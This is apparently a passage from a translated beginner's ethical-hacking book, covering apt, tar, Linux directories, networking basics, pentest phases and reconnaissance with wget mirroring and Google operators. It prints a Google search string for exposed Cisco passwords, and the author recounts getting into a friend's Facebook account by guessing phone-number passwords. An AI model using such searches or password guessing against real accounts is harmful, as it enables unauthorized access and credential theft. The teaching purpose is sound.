Now let's try installing packages with the apt-get command. The command to use is apt-get install pkg-name. Let's install a free photo-editing program similar to Photoshop. Its pkg-name is gimp, so the command to install gimp is apt-get install gimp. In the same way, to install VirtualBox, type apt-get install virtualbox.

Update
apt-get does more than install apps and dependencies. It can also show whether updates are available for the installed packages, and it can carry out the update. After adding entries to the sources list, or whenever a source has changed, use the apt-get update command to connect the new source to our system. In the same way, apt-get update can be used to check whether upgrades are available for the packages in our system.
(Note: apt can be used in place of apt-get. For example apt update, apt install gimp, ...)

Upgrade
No system is ever complete. The operating system in particular is always in a development state: being improved, made easier to use, patched, given new features, having its bugs fixed, and so on.

When new versions are available for the packages installed on our Kali Linux, the command for upgrading them is also run through apt-get (or) apt. When there is something to upgrade (that is, when a new version of an application has been released), running apt-get update (or) apt update shows something like this.

What you see will not be exactly the same as in the figure above. The packages can differ depending on when you start using the system. In the figure you will see 399 packages can be upgraded. Run 'apt list --upgradable' to see them. This says that 399 packages can be upgraded, and that apt list --upgradable will show the list of packages that can be upgraded.

The figure above is what you see when you list the upgradable packages; I have included only a few of them. In the figure, the package name appears at the start of each line. If you try it on your own computer, it will be shown in green. That is the package name, and what follows the / is a short description of it. You can also see from which version to which version it will be raised.

In the figure above you can see that the packages yersinia, zsh and zsh-common are among those that can be upgraded. If you want to upgrade only the package you need, you can use apt install. For example, to upgrade zsh, use apt install zsh.
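Reading the upgradable list line by line, as an added example that is not from the book. The listing is constructed sample text in the layout apt prints (name/suite, new version, architecture, old version in brackets); the package names are the three mentioned above, and the suite and version numbers are made up.

```shell
#!/bin/sh
# Added demo. The listing below is constructed sample text in the layout that
# `apt list --upgradable` prints; suite and version numbers are made up.
sample_listing() {
    cat <<'EOF'
Listing... Done
yersinia/kali-rolling 0.8.2-2 amd64 [upgradable from: 0.7.3-3]
zsh/kali-rolling 5.3.1-4 amd64 [upgradable from: 5.2-5]
zsh-common/kali-rolling 5.3.1-4 all [upgradable from: 5.2-5]
EOF
}

# Read a listing on stdin; print "package old-version -> new-version" per line.
# Lines without the "[upgradable from: ...]" part (the header) are skipped.
upgradable_summary() {
    awk '/\[upgradable from: / {
        split($1, id, "/")              # id[1] = package name, id[2] = suite
        old = $NF; sub(/\]$/, "", old)  # last field is "old-version]"
        print id[1], old, "->", $2      # $2 is the version on offer
    }'
}

# Exit 0 if package $1 is in the listing on stdin, 1 otherwise. The name is
# compared exactly, so "zsh" does not also match "zsh-common".
is_upgradable() {
    upgradable_summary |
        awk -v p="$1" '$1 == p { found = 1 } END { exit !found }'
}

sample_listing | upgradable_summary
if sample_listing | is_upgradable zsh; then
    echo "zsh has an upgrade waiting: apt install zsh"
fi
```

On a real system, pipe `apt list --upgradable 2>/dev/null` into `upgradable_summary`; apt itself warns that its output format is not a stable interface for scripts, so treat the parser as a reading aid.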

When you use the apt-get install (or) apt install command, some packages ask you to confirm whether to install. Others do not. The question usually reads Do you want to continue? [Y/n]. Type y, in upper or lower case, and press Enter. The Y in Y/n is shown as a capital letter because Y is the default. If N is shown as the capital, the default is N. In this case we do want to install, so the answer is Y. If you want to skip the Y/n question, just add -y after the command. For example, to install gimp without having to answer Y/n, type apt install gimp -y (or) apt-get install gimp -y. When the install progress reaches 100% and a new command line appears, the installation has finished.

To upgrade all of the upgradable packages discussed earlier, use apt upgrade -y as in the figure above. I do not think I need to explain again that -y means answering y in advance to the Y/n question.

Distribution Upgrade
This one does not come up as often as apt upgrade. It is used only for things like a new kernel version or a new system version (in the way Android can be raised from version 5 to 6 or 7, for example). Say we have Kali Linux 2016.2 installed, and Kali Linux has now (at the time of writing) reached version 2017.1. Do we have to install it all over again? No. There is a command for exactly that situation: apt dist-upgrade (or) apt-get dist-upgrade.

I forgot to mention one thing. The apt commands (apt update, apt upgrade, apt install, apt dist-upgrade) need the internet. They only work while an internet connection is up.

Removing Packages
Now that we know about install, let's go on to uninstall. Only the words install and remove differ; the procedure is the same. For example, to remove gimp again, use apt remove gimp (or) apt-get remove gimp. I will not show it with figures.

Auto-removing
When the packages (applications) in our operating system are upgraded, the old versions of those packages are left behind even though they are no longer needed. They need to be removed. Let's say this should be done after every upgrade (or) dist-upgrade. The command to give is apt autoremove. autoremove is written as one word.

Purge
Some Linux users do not know about purge, and some avoid it. remove and purge are not the same. The difference is that apt remove pkg only uninstalls a package and does not delete its configuration files. They are kept on the machine so that they can be used again the next time they are needed. purge deletes all of the configuration files as well. So you may well ask why purge is still used.

It is used when you want to reinstall an app completely from scratch. apt purge pkg-name is also used in situations such as a mistake in the configuration file, or a program that no longer works because you edited something and forgot what you changed. For example, to remove gimp completely and then use it again, remove it with apt purge gimp and reinstall it with apt install gimp.

Clean
When we install with apt install pkg, the packages are downloaded from the relevant sources. They are then unpacked and installed. After the installation, the packages that are no longer needed stay behind in our system. As they accumulate, HDD space runs low. So they need to be cleaned out, and for that you can use apt clean (or) apt-get clean.

Auto clean
autoclean works in the same way as clean and is used after running apt upgrade and apt dist-upgrade. You can remember it as clearing out the old version after an app has been upgraded to a new version. Its usage is apt autoclean (or) apt-get autoclean.

Combining Commands

To combine commands, put the && symbol (two of them) between them. For example, apt update && apt upgrade && apt dist-upgrade. Another example is apt autoremove && apt autoclean. This joins commands that can be run one after another.

Removing Debian Packages


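We have already discussed that Debian packages (.deb) are installed with dpkg -i pkg.deb. To remove one, use -r (remove) or -P (purge, a capital P) in place of -i (install). Unlike -i, these two options take the name of the installed package, not the name of the .deb file.
dpkg -i example.deb   # install from the .deb file
dpkg -r example       # remove the package, keep its configuration files
dpkg -P example       # purge the package together with its configuration files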

Tarballs
This is a program for making file archives, like the zip and rar that we know. The name TAR is short for Tape Archives. Because it can bundle a large number of files together, the tarball format is used in the same way as zip and rar. It is used mainly for Linux packages.

As in the figure above, I created two files, 1.txt and 2.txt, in a directory called a on the Desktop. (This has already been covered, so I will not explain it again.)

The command to use has the form tar -cf name.tar.gz file1 file2 file3. tar -cf means create a tar file. In name.tar.gz the name can be whatever you like, but it must contain no space, and it must end in .tar.gz. file1, 2, 3, ... must be the files you want to put in, and they must be in the current directory. If we now list the directory with ls, we will see that the file we created, test.tar.gz, has been added.

That is how to add files one at a time. To put a whole folder (directory) into a tar, you can use tar -cf name.tar.gz *. The * means put everything in the current directory into the tar file.

Now you can see the two tar files I have created. To list the files that a tar file contains, use tar -tf.

This lists the files inside the test.tar.gz that was created a moment ago.

In the same terminal I deleted the files 1.txt and 2.txt with rm. Looking with ls, they are no longer there. Now let's extract the tar again.

Look at the figure. To extract test.tar.gz, tar -xf is used. Listing with ls shows the two files that were put into the tar once again. If you want to see the file list while extracting, use tar -xvf. If you want to know what each of the letters x, v, c and f that I used in these examples means, type tar --help in the terminal and look them up.

Other commands can be asked for their help options in the same way. If you also want to reduce the file size, use tar -czf instead of tar -cf. This chapter has introduced Linux and gone through the general Linux commands that new Linux users should know.
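The create, list and extract steps above as one round trip, in an added example that is not from the book. It also checks the first two bytes of each archive to show that tar -cf writes an uncompressed archive whatever the file is called, and that the gzip compression comes from -z. File names and contents are constructed.

```shell
#!/bin/sh
# Added demo; the files are constructed and live in a mktemp directory.

# Print "gzip" if file $1 starts with the gzip magic bytes 1f 8b, else "plain".
archive_kind() {
    magic=$(od -An -tx1 -N2 "$1" | tr -d ' \n')
    if [ "$magic" = "1f8b" ]; then echo gzip; else echo plain; fi
}

# Prints: <kind of -cf archive> <kind of -czf archive> <listing> <restored text>
tar_demo() {
    work=$(mktemp -d) || return 1
    (
        cd "$work" || exit 1
        echo one > 1.txt
        echo two > 2.txt

        tar -cf  plain.tar.gz 1.txt 2.txt   # -c create, -f archive file name
        tar -czf small.tar.gz 1.txt 2.txt   # -z compresses the archive with gzip
        kinds="$(archive_kind plain.tar.gz) $(archive_kind small.tar.gz)"

        listing=$(tar -tf small.tar.gz | paste -sd, -)   # -t lists the members

        rm 1.txt 2.txt                      # delete the originals ...
        tar -xf small.tar.gz                # ... and bring them back with -x
        restored=$(cat 1.txt 2.txt | paste -sd, -)

        echo "$kinds $listing $restored"
    )
    rm -rf "$work"
}

echo "result: $(tar_demo)"
```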

Linux File System


Let's round off this chapter with the Linux file system. It is easy to read, so I will not explain it.
/bin/: basic programs
/boot/: Kali Linux kernel and other files required for its early boot process
/dev/: device files
/etc/: configuration files
/home/: user's personal files
/lib/: basic libraries
/media/*: mount points for removable devices (CD-ROM, USB keys, and so
on)
/mnt/: temporary mount point
/opt/: extra applications provided by third parties
/root/: administrator's (root's) personal files
/run/: volatile runtime data that does not persist across reboots (not yet
included in the FHS)
/sbin/: system programs
/srv/: data used by servers hosted on this system
/tmp/: temporary files (this directory is often emptied at boot)
/usr/: applications (this directory is further subdivided into bin, sbin, lib
according to the same logic as in the root directory) Furthermore, /usr/share/
contains architecture-independent data. The /usr/local/directory is meant to be
used by the administrator for installing applications manually without
overwriting files handled by the packaging system (dpkg).
/var/: variable data handled by daemons. This includes log files, queues,
spools, and caches.
/proc/ and /sys/ are specific to the Linux kernel (and not part of the FHS).
They are used by the kernel for exporting data to user space.
(This file system list is copied from Kali's official page.)
CHAPTER 6: General Knowledge for Hacking

1. Basic Networking Concepts

From this title you may think the subject has become rather large. You may also think: what we are learning is hacking, not networking. And you may already know that hacking puts the principles of networking to use. Those who have studied networking will probably already know what is discussed under this title. This section is included for those who do not. It is not a dedicated text on networking, so it will not cover every networking concept. I will only give brief outlines of the principles you cannot do without.

Networking is the way computers and other modern electronic devices communicate with one another. Networking is a complicated topic. Here I will keep it as short as I can and make the essentials easy to understand.

As I said just now, networking is the way computers communicate with each other, and with other modern electronic devices. If we picture routes running between those devices, networking can be seen as electronic roads between computers. Those roads can be physical, like CAT 5 or 6 cables and fiber optic cables. They can also be non-physical, like wireless. Put most simply, there is wired networking and wireless networking.

Wired and wireless networking have basically the same components. To make a connection, two computers, or more than two devices, are needed. Likewise, the devices being connected need the right connection and the right configuration.

To make this easier to understand, let me explain it the way one of my teachers once did. Take a network (a small network) like the one above. Suppose two people, Adam and Bill, want to connect their computers.

As the figure shows, Adam has connected his computer over the wireless connection provided by the router, while Bill has connected his computer to the router by cable. The way they connect is different, but they are in the same network. I will not go into the details. If you want to study them, there are networking courses and books in Burmese.

According to Fig: 5.1, the IP address of the router is 192.168.1.1. This is called a private address, and it cannot be used on the internet. Looking further at the figure, Adam's IP address is 192.168.1.11 and Bill's computer is 192.168.1.10. These are private IP addresses. For them to be usable on the internet, the router has to perform Network Address Translation (NAT). That is, it has to convert Adam's and Bill's IP addresses into addresses that can be used on the internet. If a user tries to use such a private IP address on the internet without the router performing NAT, internet routers and other devices will refuse the connection, and the communication will fail.
The router keeps the internal network and the external network separate. It routes the private network out to the public network so that it can reach the internet. This is why Adam's and Bill's IP addresses are only addresses on the router's internal interface side. The router's address on that side is called the Default Gateway, and it is used when configuring the network cards of the two users' (Adam's and Bill's) computers.
To picture the default gateway, imagine a small town with only one road. Just as someone who wants to leave the town needs to know that road, the computers on a network need to know the route that leads out of the local network. That route is the default gateway.
When computers talk to one another they use numbers, as readers will already know. For everything to communicate correctly, a network generally relies on a name server, or Domain Name Server (DNS). Machines only know numbers, but it is not practical for us humans to remember nothing but numbers. That is why the numbers are mapped to a human-readable format such as www.google.com or www.facebook.com. Without DNS, people would have to remember the IP address of every website, and the chance of remembering them all would be very small. So if you want to configure a network card manually, you need the identification of the DNS or name server.
DHCP automatically assigns the IP, subnet mask, gateway, DNS and so on to the devices on the network. On Linux, the command for viewing the IP address is ifconfig. The Windows cmd command is ipconfig.
Before we try ifconfig in practice, there are a few things to explain first, namely the kinds of connection we use. If you ask people how they get internet access on their computer, the answers fall into two main groups: (1) "I share wifi from my phone and connect the computer to it", or "I connect to some other wifi network"; (2) "I use a cable", or "I plug my phone into the computer with a USB cable and use USB tethering". Those are the two main kinds of answer you will get. Put most simply, they divide into the wireless wifi system and the wired cable system. In the Kali Linux we will be using, the wireless wifi interface is called wlan0 (w lan zero), and the network interface used with a cable connection is called eth0. Now let's type ifconfig in the terminal: ifconfig (enter).

In the figure above you will see eth0, wlan0 and lo. lo stands for Local Loopback, and it is just a virtual network interface that our computer uses to communicate with itself. It is mainly used to connect to servers running on the local machine.
I don't know whether that got confusing. I think it needs a little more explanation. It goes like this. There are two ways our computer connects to the internet. I have already explained wlan0 and eth0. Those things called wlan0 and eth0 are network interfaces.

(wlan0) wireless network interface card (eth0) network interface card


The two pictures above show the network interface cards that wlan0 and eth0 use to connect to the internet. What this means is that each of them only works if the corresponding hardware is present. For example, without a wifi card you cannot use wifi. eth0 is included in every computer. (Today's laptops and notebooks also include a wifi card.)
Back to lo. wlan0 and eth0 can no longer be used once the network they are connected to goes down. lo, however, can still reach the servers running locally. lo needs no dedicated hardware, and it does not stand in for any other hardware either. Let's get back to IP addresses.
So the thing we absolutely have to keep in mind is which of the two, wlan0 or eth0, we are actually using.

In the Kali Linux we are using now, as soon as you run ifconfig you will see eth0, lo and wlan0. If we are using eth0, the IP address will show up under eth0. In this picture I am using wifi, so it shows up under wlan0.
If you don't want to see everything and only want to look at the one interface you are using, you can run ifconfig wlan0 or ifconfig eth0. Looking at them one at a time gives the same information, so I won't show it. To continue: on the second line for the wlan0 that I am using, you will see inet 192.168.10.150 netmask 255.255.255.0 broadcast 192.168.10.255. The first item, inet 192.168.10.150, is my current IP address. Your own IP address may be 192.168.--.--. In VMWare or VirtualBox all of it may well be different. You have to use your own address. :)
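The values read off the ifconfig output above can also be checked mechanically. The following is an added example, not code from the book: it parses a constructed ifconfig listing, recomputes the network and broadcast address from inet and netmask, and reports whether the address is private (and so depends on the router's NAT). It goes slightly beyond the text by recognising all three RFC 1918 private ranges, and the function names are assumptions.

```python
import ipaddress
import re

# RFC 1918 ranges: the "private addresses" that cannot be used on the internet.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample in ifconfig's layout; wlan0 carries the values quoted in
# the text, eth0 has no cable plugged in and therefore no inet line.
SAMPLE_IFCONFIG = """\
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:00:5e:00:53:01  txqueuelen 1000  (Ethernet)
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.150  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::1  prefixlen 64  scopeid 0x20<link>
"""

IFACE_RE = re.compile(r"^(\S+?):\s+flags=")
INET_RE = re.compile(r"^\s+inet (\S+)\s+netmask (\S+)(?:\s+broadcast (\S+))?")


def private_block(ip):
    """Return the RFC 1918 block containing ip, or None for a public address."""
    addr = ipaddress.ip_address(str(ip))
    for net in RFC1918:
        if addr in net:
            return str(net)
    return None


def parse_ifconfig(text):
    """Return {interface: facts} for every interface that has an IPv4 address."""
    interfaces = {}
    current = None
    for line in text.splitlines():
        header = IFACE_RE.match(line)
        if header:
            current = header.group(1)
            continue
        inet = INET_RE.match(line)  # "inet6" lines do not match "inet "
        if not (inet and current):
            continue
        addr, mask, reported = inet.groups()
        iface = ipaddress.ip_interface(f"{addr}/{mask}")
        computed = str(iface.network.broadcast_address)
        block = private_block(iface.ip)
        interfaces[current] = {
            "address": str(iface.ip),
            "network": str(iface.network),
            "broadcast": computed,
            # None when ifconfig printed no broadcast field (loopback)
            "broadcast_matches": (reported == computed) if reported else None,
            "private_block": block,
            "loopback": iface.ip.is_loopback,
            # A private, non-loopback address only reaches the internet via NAT
            "needs_nat": block is not None,
        }
    return interfaces


if __name__ == "__main__":
    for name, facts in parse_ifconfig(SAMPLE_IFCONFIG).items():
        print(name, facts)
```
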

2.Hacking Lab
If I described this topic in detail it would take up many pages and leave too few for everything else, so I won't show the setup steps here. You can find the methods for creating a hacking lab at www.khitminnyo.com. A hacking lab means a virtual laboratory built right inside our own machine, so that while we study hacking we can carry out our experiments without harming anyone.
Most people use VirtualBox or VMWare as their hacking lab. What is usually installed in it depends on our host OS. If we use Windows as the host, the VMs are Kali Linux, Windows (for testing), Metasploitable, DVWA and so on. If we use Kali as the host, we can install Windows, Metasploitable, DVWA and so on as VMs for the hacking lab.
What to install and how to use it, given the RAM and HDD of your own machine, can be discussed through our Facebook group or over Viber.
CHAPTER 7: Penetration Testing Life-cycle

Steps performed by Hackers

No two hackers are alike. They have different motives, techniques and abilities. In the same way, how they go about their work also tends to differ. In general, the steps hackers usually perform are divided into seven: 1. Reconnaissance, 2. Scanning, 3. Access and escalation, 4. Exfiltration, 5. Sustainability, 6. Assault and 7. Obfuscation. In this book, I take penetration testing (ethical hacking) as the basis and summarize the main activities in just five phases.

Phase 1. Reconnaissance
Suppose a crime has taken place, and suppose a suspicious group has turned up in the case. Let's think as if we were law enforcement. What do we do first? Do we go straight out and arrest that group? What we have to consider here is that if we go to arrest them without having any information, we will trip ourselves up and the whole thing will turn back on us, and important links in the chain will be lost as well.
So what do we do? We have to keep that suspicious group under observation. We have to investigate first to learn about them. What do they do? What do they use? What weapons might they have? What else stands behind them? In this way we have to search out and collect every piece of information connected with the group we have made our target.
In the same way, if we are going to carry out a penetration test (hacking), we need to collect every piece of information related to the company or organization that is our target. Some of that information can be found and collected from the internet, and some of it may have to be found and collected in the outside world. So the first phase we have to carry out is Reconnaissance, also called Information Gathering or Footprinting.
The details will be discussed further in the relevant chapters.
Phase 2. Scanning

Picture a soldier who has reached a small hill right next to enemy territory. Just one soldier, mind you. He has a map with him, and he also carries a pair of binoculars. So that the enemy cannot easily spot him, he hides among the dense bushes while he reports back to his unit.
He reports whether the enemy camp matches the map, or where on the map it is; roughly how strong the enemy force is; how many buildings he can see; how many enemy guard posts there are and which places they mainly watch; and so on.
Looking at this little scenario, we can tell that the soldier has a mission: his duty is to find out things such as whether there is any gap between the information he was given in advance and the situation on the ground (the actual conditions). His duty is not yet to attack.
Likewise, when carrying out a penetration test, we scan the target network and information systems on the basis of the information obtained in the first phase (Phase 1). That is Phase 2. In this phase we use tools that can perform scanning and try to learn more about the target's network and system infrastructure. Only then can we decide how to exploit in the next phase.
The details will be presented in the relevant chapters.

Phase 3. Exploitation

For real soldiers, this phase may well be the actual fighting. In ethical hacking, though, let's change the picture a little. In this phase the soldier from before approaches the fence of the enemy camp under cover of dim moonlight and overcast clouds. Going by the positions of the sentries he studied beforehand, he circles around from the weak side. Because the thick clouds are helping him on top of the faint moonlight, he is able to get over the fence, and because the guards are not alert, thinking that nobody could possibly come, he is able to open the back door of the main building and go in. He takes the file containing the important information from inside the building and is able to leave the way he came without anyone knowing. Let's suppose so.
The scenario above is Phase 3 of hacking. The aim of this phase is to get into the target system, obtain the information, and get back out without anyone knowing. To be able to do that, the exploits have to be used correctly according to the vulnerabilities of the target system.

Phase 4. Maintaining Access

Using the experience of the soldier who managed to break into the enemy camp, and the drawings made from it, skilled engineers can dig an underground tunnel right up to the spot directly beneath the most critical room of the main building. The aim is to be able to get in again next time more easily and quickly.
In the same way, Phase 4 of hacking requires leaving backdoors and rootkits behind so that getting back into the target system next time is easier. Only then will the next entry be easier and faster. That is Maintaining Access.

Phase 5. Reporting

This phase is normally carried out only by ethical hackers (penetration testers). After succeeding in the four phases described above against the target system, they have to contact the people responsible for the target system and give them a report. The purpose is for the target company or organization to know and realize what the weaknesses of the system are, how entry was gained and how far it could be taken, and what could be lost, and how much, if it really were attacked.
That was only a brief outline of the steps performed by hackers. Let's pause the discussion here. In the next chapter we will discuss the first step.
CHAPTER 8: Reconnaissance

Introduction

Before a battle begins, every piece of information about the enemy has to be gathered, as much as can be obtained. In just the same way, before a pen test begins, a penetration tester has to gather all the information there is about the target system. A great deal of information can be found on Google, and more can be obtained from social media such as Facebook, Twitter and so on.
Collecting information (Information Gathering) is called Footprinting, and the whole process of collecting information in this way is called Reconnaissance. So, roughly speaking, these three are the same thing.
Reconnaissance, then, is the hacker's very first step: collecting as much as possible of all the information related to the target. The target may be a network or a system. The information obtained in this phase helps a great deal in mapping the target's network infrastructure and security. From this information we will be able to work out ways of getting into our target system.
Fine. So which information do we have to collect? What counts as sensitive information? Sensitive information is our target's network type, network devices and systems, employee information (name, phone, email, etc.), physical and electronic security systems, organizational infrastructure including company or organization structure, departments, charts, IP space and network topology, organizational partners, physical locations and so on.
Fine. Where does that information come from? It can be obtained from internet search engines like Google and DuckDuckGo, and it can also be learned from the company's websites and job advertisements. It can be obtained from company employees too, and from people who left the company recently, or from the kind of employee who is disgruntled at work (because someone below them was promoted above them). To obtain it from people like these, social engineering is used.
Covering reconnaissance completely could take nearly a whole book. So allow me to stop at this point.

Start with the Target's Own Website

First of all, let's go and look at the target's own website. Most websites proudly display organizational charts and leader profiles. These matter as well: on the basis of these details, social media profiles can be found, and they can open the way to using social engineering.
For example, some Facebook users are still using their phone numbers as their passwords. In the same way, on some profiles that require a login, people make the phone number the password so that it is easy to remember. I once tested this on a few Facebook friends I know in real life. I took the ID from the profile link and tried their phone numbers one after another in the password field, and I found that one phone number let me in.
So when we set up logins for our own business, it is important not to use phone numbers as passwords. The people who use the devices (computers) inside our organization also need to be told the same thing so that they are aware of it.
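One way an organization could enforce this advice at the moment a password is chosen, as an added example that is not from the book: the function names, the 12-character minimum and the sample phone number are assumptions constructed for illustration, and 95 is used as the country code.

```python
import re


def digits_only(text):
    """Strip everything except digits, so '+95 9-7000 12345' -> '959700012345'."""
    return re.sub(r"\D", "", text)


def phone_variants(phone, country_code="95"):
    """Return the common spellings of one phone number.

    A number on file may be stored as '+95 9 ...' while the user types the
    national form '09...', so all forms have to be compared.
    """
    digits = digits_only(phone)
    if digits.startswith(country_code):
        national = digits[len(country_code):]
    elif digits.startswith("0"):
        national = digits[1:]
    else:
        national = digits
    return {national, "0" + national, country_code + national}


def password_problems(password, known_phones=(), min_length=12):
    """Return a list of reasons to reject the password (empty list = accepted)."""
    problems = []
    if len(password) < min_length:
        problems.append("too short")

    pw_digits = digits_only(password)
    # Heuristic: a password that is almost entirely digits and as long as a
    # phone number is treated as one, even if it is not on file.
    if password and len(pw_digits) / len(password) >= 0.8 and 7 <= len(pw_digits) <= 15:
        problems.append("looks like a phone number")

    # Reject any password that embeds a phone number already known for the
    # account (profile data, HR record), in any of its spellings.
    for phone in known_phones:
        if any(len(v) >= 7 and v in pw_digits for v in phone_variants(phone)):
            problems.append("contains a phone number on file")
            break
    return problems


if __name__ == "__main__":
    on_file = ["+95 9 7000 12345"]  # constructed sample number
    for candidate in ("09700012345", "Mg9700012345!", "correct horse battery staple"):
        print(repr(candidate), "->", password_problems(candidate, on_file) or "accepted")
```
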
Some websites carry job advertisements. By looking at the required qualifications or the duties listed in those advertisements, you can also learn which technologies the organization uses. For example, when the description for a systems administrator job says something like "that are familiar with Active Directory and Windows server 2012", you can tell that the organization is using at least Windows Server 2012. Based on that information, a hacker considers which vulnerabilities are likely to be present. Based on the vulnerabilities, the exploits that could be used to attack can be considered as well.
Next, let's look at the Windows side of the computers currently in use in our country. Very few of us buy and use a licensed version of Microsoft Windows. The widespread use of cracked versions and weak patch management are at the very top of the list of things that make systems vulnerable.

Website Mirroring

To evaluate our target website, we can also take a copy of the whole website so that it can be used offline. This is also called full site cloning. For this we can use the wget command, which is already built into the Kali Linux we are using. One thing to remember is that when you do this, you will not be able to copy the server-side programming of some web pages, such as those created with PHP scripts. As an example, I will clone http://www.bible-history.com/.

Look at the figure above. The command I used is wget -m -p -E -k -K -np -v http://www.bible-history.com/.

If you study the command above, you will see that the main command, wget, is followed by a number of options. The meaning of each one can be looked up in the manual and the help output. I will come back to that later. For now, let's carry on with cloning using wget.
When we download a website for offline use with wget, the time and the amount of internet data it takes will vary with the size of the site we are fetching and the amount of data it holds. For the example I showed, bible-history.com, there are so many MB of data that it can take hours. If the connection is poor, it can take even longer than that.
When it finishes, a new command-line prompt appears, and if you open the folder you will see the following.

Command Manual and help


This time the discussion continues on from what was covered under website mirroring. Strictly speaking this should have been presented back in the Linux Basic chapter, but I carried it along to this point so that it would be easier to remember and understand. If you want to study the options that followed the wget command we used earlier, you can bring up the manual in the terminal. The command to use is the man command. For example, to read the manual for wget, just type man wget.

The user manual for wget will then appear, and you will be able to find out what the -m used above is, what -p is, and so on. To leave the manual, just press q. The same goes for other tools (commands).
Another option is the help option. It is one that is used a great deal. It is written -h, but for some tools it is not -h. So when you want to call up the help options, the most commonly used form is --help. For wget, for example, that is wget --help.

Calling up the help option like this is another way to study and take note of the options.

In that help output you can see the command options that follow wget. -V means the version, -o is the output file, and so on. With this much, I assume you can now find the command options I used above. Let's move on to another topic.

Google Search
This time I will discuss a kind of Google search that most of us don't get around to using. Some people may well want to say, "Google Search? We use that all the time." Well, let's see.
When we want to look something up, we use internet search engines. Using a search engine is nothing strange to us. For example, we use Facebook. When we want to find an account or some piece of content quickly, we tap the little round magnifying glass at the top of the Facebook application on our phone and search. For example: MPT, MRTV 4, Telenor Myanmar and so on. The pages, accounts, posts, movies and so on related to those search terms then appear. That, too, is using a search engine.
So using search is nothing strange to any of us. In the same way, when people want to search not just within Facebook but across everything on the internet, they use search engines such as Google, Yahoo and Bing. Google is the most widely used search engine. We have all used Google search. The kind of searching I am about to show, however, is used by only a few people. Let's see what the difference is.
First, type this address into your browser: www.google.com/advanced_search. Once you enter it, a page like this one will appear.
In the picture the view is small. To see it properly, open it in the browser (Firefox or Chrome) on your own computer. Here I will go through it part by part, one heading at a time.

The first box is All These Words. This field is used for the main words you want to search for. For example, suppose you enter Ethical Hacking. It will show results where those words are found in any part of the web page, whether as Ethical Hacking in sequence or with ethical in one place and hacking in another. In other words, this is just the way we normally search.

The second field, as its name exact word or phrase says, means searching only for pages that contain precisely the words we type in. That is, if we enter Ethical hacking there, it will not show a result unless it finds the words Ethical hacking in that sequence. To use this in a normal search, put the phrase between opening and closing quotation marks. For example, "ethical hacking".

The third field is any of these words, so it will show a result even when the words we search for appear individually rather than together. If we search for Ethical Hacking there, it will show any page containing either Ethical or Hacking. To use this in a normal search, join the words with OR. (ethical OR hacking)

This field, none of these words, is for entering the words you do not want shown, in other words the words you do not want included. To use this in a normal search, add a minus sign. For example, if you don't want John to be included, use -John.

In this part you can also use numbers with units. For example, things like 20$ to 50$, or 20miles to 50 miles. It can be used in the normal search box as well. For example, it can be entered in the form 20$ 50$.

I don't think these parts need explaining. last updated is for choosing when the content you are looking for was last posted. For example, suppose you search for a method. The results that come out might have been posted around 2000. They could also have been posted around 2010. If what you want is the latest update, you have to choose the most recent.

It is just as in the figure above. You can choose to search for things posted within the past 24 hours, the past week, the past month or the past year.

If you are worried about getting too many results when you search, you can also restrict them by site or domain. For example, wikipedia.org and so on. To use this function in a normal search, you can use site:. For example, site:wikipedia.org and so on.

The next one is terms appearing. The first of the choices there is "anywhere in the page". Just as in a normal search, the result is shown wherever the thing you searched for appears. The next one, "in the title of the page", means show only the pages where what we are searching for is in the title. To use this in a normal search, you can search with intitle:. For example, intitle:hacking , intitle:"ethical hacking".
Next, "in the text of the page" means searching for pages where the information we are looking for appears in the body text rather than in the title. To use this in a normal search, you can use intext:. For example, intext:hacking.
The next one is "in the URL of the page". It searches inside the URL, and you can use inurl: for it. For example, to search for URLs containing mm, you can search with inurl:mm. The last one, in links to the page, is not used much. You can search with inlink:example.com.

Safe Search has two options: show most relevant results is the normal behaviour, and filter explicit filters sexually explicit videos and images so that they do not reach the search results.
The next option, File Type, I won't explain. It gives you choices according to the type of file you want to find. To include the file type in a normal search (say you want to find pdf), you can search with filetype:pdf.

The last function, usage rights, is also rarely used. People normally just search with the default, so I won't go into that part.

Google Hacking & Google Hacking Database


I assume everyone knows and is familiar with this heading. It is a technique first devised by Johnny Long, which combines Google operators and terms with the Google search engine so that extremely valuable information can be obtained through the internet. Roughly speaking, it is a technique that focuses on the precise use of targeted expressions to query the Google database in order to obtain information about people and organizations.
Many technical books have been published about Google hacking, and the most famous is Google Hacking for Penetration Testers, written by Johnny Long himself. You can read it as an ebook at www.khitminnyo.com.
The Google Hacking Database (GHDB) compiles a large number of Google hacking search query strings, and the original database is at www.hackersforcharity.org/ghdb. Offensive Security, the parent of Kali, also presents the GHDB, and it can be viewed at www.offensive-security.com/community-projects/google-hacking-database/. At www.exploit-db.com/google-hacking-database, which Offensive Security maintains, the Google hacks are reorganized into 14 categories.

Among those 14 categories there is one called Files Containing Passwords, which contains more than 160 search strings. From among them, as an example, I will show one search string that can be used to look for Cisco passwords.

You can try searching for it yourself in Google Search. When you search using enable password | secret "current configuration" -intext:the, you will see about 65,000 search results come out, although a few of the files may not contain a password. It can also be combined with other operators such as site:.

Social Media
What comes to mind the moment you see this heading? I believe most people picture Facebook. Social media is part of people's everyday lives today. In our country, Facebook and Instagram have the most users, while Twitter and LinkedIn still have rather few. From a social media profile such as Facebook you can obtain certain information, and you can estimate and sketch out your target's interests.
LinkedIn still has few users here, but it is a social medium from which you can obtain organizational charts and emails, as well as other sensitive information (e.g. JD). The existence of these social media also gives hackers more opportunities to use social engineering.

DNS and DNS Attacks


Almost everyone already knows that DNS refers to the Domain Name System/Service. Everyone also knows that we use DNS because remembering Google as google.com is easier and more memorable than remembering it as 173.194.46.19. We humans find names easy to remember, but computers (and other machines) only remember numbers. So DNS can be noted down as the system that translates names that humans understand, such as google.com or facebook.com, into IP addresses that machines understand, such as 192.168.0.1. The name server takes on that job of translating.
A name server holds extremely useful information. For example, a name server contains information such as the mail server, MX record and domain. Let's go on to discuss nslookup in Kali Linux. Open the terminal.
If you enter nslookup in the terminal, a ">" symbol will appear. It is the greater-than symbol, but it is called the carrot. At this carrot you can enter the domains you want to investigate. To get out of the carrot (>) and back to the terminal, type exit.

Let's go back into nslookup. Type nslookup in the terminal and press enter.

